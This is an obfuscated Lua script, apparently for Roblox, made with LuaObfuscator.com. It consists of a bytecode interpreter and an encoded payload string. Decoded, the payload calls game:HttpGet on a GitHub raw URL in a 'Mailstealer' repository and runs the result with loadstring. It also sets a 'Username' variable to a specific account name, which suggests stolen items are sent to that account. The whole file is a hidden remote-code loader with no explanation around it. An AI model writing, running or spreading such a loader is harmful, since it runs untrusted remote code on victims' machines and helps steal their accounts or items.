--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=v5(v83,v19);v19=nil;return v100;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v84-(v84%((2569 -(1523 + 114)) -(857 + 74))) ;else local v85=(570 -(367 + 201))^(v32-(928 -(193 + 21 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * 256) + v35 ;end local function v23()local v37=1270 -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==(4 -3)) then return (v41 * (16777333 -(32 + 85))) + (v40 * (64226 + (5206 -3896))) + (v39 * (469 -213)) + v38 ;end if (v37==(350 -(87 + (1215 -(802 + 150))))) then v38,v39,v40,v41=v1(v16,v18,v18 + ((135 + 48) -(67 + 113)) );v18=v18 + 3 + 1 ;v37=1 + 0 ;end end end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((779 -(201 + 571)) -4)) then if (v47==(0 -0)) then if (v46==0) then return v48 * ((1138 -(116 + 1022)) + 0) ;else v47=998 -(915 + (341 -259)) ;v45=0 -0 ;end elseif (v47==(1193 + 854)) then return ((v46==(0 -0)) and (v48 * ((1188 -(1069 + 70 + 48))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -1214) ) * (v45 + (v46/((1 + 1)^(189 -137)))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(793 -(368 + 423))) then v47=v20(v44,65 -44 ,49 -(10 + 8) );v48=((v20(v44,32)==(3 -2)) and  -(443 -(416 + 26))) or 1 ;v42=9 -6 ;end if (v42==((3 -2) + 0)) then v45=1 -(859 -(814 + 45)) ;v46=(v20(v44,439 -((357 -212) + 293) ,450 -(44 + 386) ) * ((1488 -(998 + 488))^(11 + 21))) + v43 ;v42=2 + 0 + 0 ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==((1374 + 376) -(760 + 987))) then return v6(v52);end if (v50==(887 -(261 + 624))) then v52={};for v90=1 -0 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=1083 -(1020 + 60) ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(1423 -((1685 -(87 + 968)) + 793))) then return "";end end v50=3 -2 ;end if (v50==(4 -3)) then v51=v3(v16,v18,(v18 + v49) -(1 + (0 -0)) );v18=v18 + v49 ;v50=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(0 -0)) then local v88=0 -0 ;while true do if (v88==(1769 -(1749 + 20))) then v54=0 + 0 ;v55=nil;v88=1323 -(1249 + 73) ;end if (v88~=(1 + 0)) then else v53=1;break;end end end if (v53==3) then v60=nil;v61=nil;v53=4;end if (v53==(1146 -(466 + 679))) then local v89=0 -0 ;while true do if (v89~=1) then else v53=5 -3 ;break;end if (v89==(1900 -(106 + 1794))) then v56=nil;v57=nil;v89=1 + 0 ;end end end if (v53==2) then v58=nil;v59=nil;v53=1 + 2 ;end if (v53==(11 -7)) then while true do if (v54==(2 -1)) then local v98=114 -(4 + 110) ;while true do if (v98==1) then v54=2;break;end if (v98~=0) then else v57=nil;v58=nil;v98=1;end end end if (v54==(586 -(57 + 527))) then local v99=1427 -(41 + 1386) ;while true do if (v99~=(104 -(17 + 86))) then else v54=3 + 0 ;break;end if ((0 -0)==v99) then v59=nil;v60=nil;v99=2 -1 ;end end end if ((166 -(122 + 44))~=v54) then else v55=0 -0 ;v56=nil;v54=1;end if (v54~=3) then else v61=nil;while true do local v101=0;local v102;while true do if (v101==0) then v102=0;while true do if (v102~=0) then else local v107=0 -0 ;while true do if (v107==0) then if ((2 + 0)~=v55) then else local v159=0;local v160;local v161;while true do if ((1 + 0)~=v159) then else while true do if (v160~=(0 -0)) then else v161=0;while true do local v171=0;while true do if (v171==(65 -(30 + 35))) then if ((0 + 0)==v161) then for v175=1258 -(1043 + 214) ,v23() do local v176=0 -0 ;local v177;local v178;local v179;while true do if (0~=v176) then else v177=0;v178=nil;v176=1;end if (v176~=(1213 -(323 + 889))) then else v179=nil;while true do if (v177==1) then while true do if (0==v178) then v179=v21();if (v20(v179,1,1)~=(0 -0)) then else local v192=580 -(361 + 219) ;local v193;local v194;local v195;local v196;local v197;while true do if (v192~=(320 -(53 + 267))) then else v193=0 + 0 ;v194=nil;v192=414 -(15 + 398) ;end if (v192==(984 -(18 + 964))) then v197=nil;while true do if (v193==1) then local v200=0;while true do if (v200==1) then v193=7 -5 ;break;end if ((0 + 0)==v200) then v196=nil;v197=nil;v200=1;end end end if (v193~=2) then else while true do if (v194~=0) then else local v202=0;local v203;local v204;while true do if (v202~=(1 + 0)) then else while true do if (v203~=(850 -(20 + 830))) then else v204=0;while true do if (v204==(1 + 0)) then v194=127 -(116 + 10) ;break;end if (v204==(0 + 0)) then v195=v20(v179,740 -(542 + 196) ,6 -3 );v196=v20(v179,2 + 2 ,6);v204=1;end end break;end end break;end if (v202~=0) then else v203=0;v204=nil;v202=1 + 0 ;end end end if (v194==(1 + 0)) then local v205=0 -0 ;local v206;while true do if (v205~=(0 -0)) then else v206=0;while true do if (v206==1) then v194=2;break;end if (v206~=(1551 -(1126 + 425))) then else v197={v22(),v22(),nil,nil};if (v195==0) then local v213=1121 -(118 + 1003) ;local v214;while true do if (v213~=(0 -0)) then else v214=377 -(142 + 235) ;while true do if (v214==(0 -0)) then v197[1 + 2 ]=v22();v197[981 -(553 + 424) ]=v22();break;end end break;end end elseif (v195==(1 -0)) then v197[3]=v23();elseif (v195==2) then v197[3]=v23() -((2 + 0)^(16 + 0)) ;elseif (v195==3) then local v223=0 + 0 ;local v224;while true do if (v223==0) then v224=0;while true do if (v224==0) then v197[2 + 1 ]=v23() -((2 + 0)^16) ;v197[8 -4 ]=v22();break;end end break;end end end v206=2 -1 ;end end break;end end end if (v194==3) then if (v20(v196,3,3)~=1) then else v197[4]=v61[v197[8 -4 ]];end v56[v175]=v197;break;end if (v194==(1 + 1)) then local v208=0 -0 ;local v209;while true do if (0==v208) then v209=753 -(239 + 514) ;while true do if (v209==(0 + 0)) then local v212=1329 -(797 + 532) ;while true do if (v212==1) then v209=1 + 0 ;break;end if (v212~=(0 + 0)) then else if (v20(v196,2 -1 ,1)~=(1203 -(373 + 829))) then else v197[2]=v61[v197[733 -(476 + 255) ]];end if (v20(v196,2,2)~=(1131 -(369 + 761))) then else v197[3]=v61[v197[2 + 1 ]];end v212=1;end end end if (v209==(1 -0)) then v194=3;break;end end break;end end end end break;end if (v193==(0 -0)) then local v201=238 -(64 + 174) ;while true do if (v201~=(0 + 0)) then else v194=0;v195=nil;v201=1;end if (v201~=(1 -0)) then else v193=337 -(144 + 192) ;break;end end end end break;end if (v192~=(217 -(42 + 174))) then else v195=nil;v196=nil;v192=2;end end end break;end end break;end if (v177==0) then local v188=0;while true do if (v188==(0 + 0)) then v178=0 + 0 ;v179=nil;v188=1 + 0 ;end if (v188==1) then v177=1505 -(363 + 1141) ;break;end end end end break;end end end for v180=1,v23() do v57[v180-1 ]=v28();end v161=1581 -(1183 + 397) ;end if (v161==(2 -1)) then return v59;end break;end end end break;end end break;end if (v159==0) then v160=0 + 0 ;v161=nil;v159=1;end end end if (v55~=0) then else local v162=0 + 0 ;while true do if (1==v162) then local v165=1975 -(1913 + 62) ;while true do if (v165==(1 + 0)) then v162=5 -3 ;break;end if (v165~=0) then else v58={};v59={v56,v57,nil,v58};v165=1;end end end if ((0 -0)==v162) then local v166=0;while true do if (v166~=(1661 -(1477 + 184))) then else v56={};v57={};v166=1 -0 ;end if (v166~=(1 + 0)) then else v162=857 -(564 + 292) ;break;end end end if (v162==2) then v55=1;break;end end end v107=1 -0 ;end if (v107~=1) then else v102=2 -1 ;break;end end end if (v102~=1) then else if (v55~=1) then else local v142=0;local v143;while true do if (v142==0) then v143=304 -(244 + 60) ;while true do if (v143==(0 + 0)) then local v167=0;local v168;while true do if (v167~=(476 -(41 + 435))) then else v168=1001 -(938 + 63) ;while true do if (v168~=0) then else local v172=0;while true do if (v172==1) then v168=1;break;end if (0==v172) then v60=v23();v61={};v172=1;end end end if ((1 + 0)==v168) then v143=1;break;end end break;end end end if ((1127 -(936 + 189))~=v143) then else v55=2;break;end if (v143==1) then local v169=0;local v170;while true do if (v169~=0) then else v170=0;while true do if (v170==(1 + 0)) then v143=1615 -(1565 + 48) ;break;end if (v170==(0 + 0)) then local v173=1138 -(782 + 356) ;while true do if (v173==(268 -(176 + 91))) then v170=1;break;end if (v173==(0 -0)) then for v182=1,v60 do local v183=0 -0 ;local v184;local v185;local v186;while true do if (v183~=(1093 -(975 + 117))) then else v186=nil;while true do if (v184==(1875 -(157 + 1718))) then local v189=0;local v190;while true do if ((0 + 0)~=v189) then else v190=0 -0 ;while true do if (v190==1) then v184=1;break;end if (v190~=(0 -0)) then else local v198=0;local v199;while true do if (v198~=0) then else v199=1018 -(697 + 321) ;while true do if (v199==0) then v185=v21();v186=nil;v199=1;end if (v199~=(2 -1)) then else v190=1 -0 ;break;end end break;end end end end break;end end end if (v184==1) then if (v185==(2 -1)) then v186=v21()~=(0 + 0) ;elseif (v185==2) then v186=v24();elseif (v185~=(5 -2)) then else v186=v25();end v61[v182]=v186;break;end end break;end if (v183==0) then local v187=0 -0 ;while true do if (v187==(1227 -(322 + 905))) then v184=611 -(602 + 9) ;v185=nil;v187=1;end if (v187==1) then v183=1190 -(449 + 740) ;break;end end end end end v59[875 -(826 + 46) ]=v21();v173=948 -(245 + 702) ;end end end end break;end end end end break;end end end break;end end break;end end end break;end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=6) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];elseif (v81==1) then local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==1) then v73=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==0) then v109=v80[2];v110,v111=v71(v78[v109](v13(v78,v109 + 1 ,v80[3])));v108=1;end if (v108==2) then for v157=v109,v73 do local v158=0;while true do if (v158==0) then v112=v112 + 1 ;v78[v157]=v110[v112];break;end end end break;end end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=4) then if (v81>3) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else do return;end end elseif (v81>5) then local v118=0;local v119;local v120;while true do if (v118==1) then v78[v119 + 1 ]=v120;v78[v119]=v120[v80[4]];break;end if (v118==0) then v119=v80[2];v120=v78[v80[3]];v118=1;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=9) then if (v81<=7) then for v105=v80[2],v80[3] do v78[v105]=nil;end elseif (v81>8) then v72=v80[3];else local v122=v80[2];v78[v122]=v78[v122](v13(v78,v122 + 1 ,v73));end elseif (v81<=11) then if (v81>10) then v64[v80[3]]=v78[v80[2]];else local v126;local v127,v128;local v129;local v130;if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v130=v80[2];v129=v78[v80[3]];v78[v130 + 1 ]=v129;v78[v130]=v129[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v130=v80[2];v127,v128=v71(v78[v130](v13(v78,v130 + 1 ,v80[3])));v73=(v128 + v130) -1 ;v126=0;for v139=v130,v73 do v126=v126 + 1 ;v78[v139]=v127[v126];end v72=v72 + 1 ;v80=v68[v72];v130=v80[2];v78[v130]=v78[v130](v13(v78,v130 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81>12) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]();end v72=v72 + 1 ;break;end if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D6503083O006F72697465313230030D3O004C6F6164696E675363722O656E00223O00124O00014O0007000100013O00260D3O0002000100010004093O0002000100122O000100013O00260D0001000F000100020004093O000F0001001205000200033O00120A000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O0021000100260D00010005000100010004093O0005000100122O000200013O00260D00020016000100020004093O0016000100122O000100023O0004093O0005000100260D00020012000100010004093O0012000100122O000300083O001204000300076O00035O00122O000300093O00122O000200023O00044O001200010004093O000500010004093O002100010004093O000200012O00033O00017O00",v9(),...);
